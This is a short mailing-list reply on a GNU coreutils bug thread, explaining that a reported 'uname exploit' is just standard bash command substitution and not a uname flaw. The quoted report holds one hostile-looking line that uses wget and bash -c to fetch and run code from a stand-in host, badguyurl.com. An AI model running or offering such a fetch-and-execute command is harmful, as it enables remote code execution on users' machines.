Subject: Re: bug#24328: uname exploit

From: Evan J Johnson <[email-masked]>
Date: Mon, 29 Aug 2016 08:47:22 -0700

Hey Shane,

I'm no bash/systems/coreutils expert, but I believe this behavior is
completely expected, independent of uname, and documented.

$(...) is the command substitution syntax and it will cause the command
inside the parens to be run, with the output used as input. Here's a
link to the behavior on gnu.org.
https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution

It won't work if you use single quotes, which is also expected.

Evan

On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote:
> Hi, I am unsure if you have seen this, but I am concerned about this - 
> can or should uname be restricted to root use only?
> 
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
> 
> 
> 
> 
>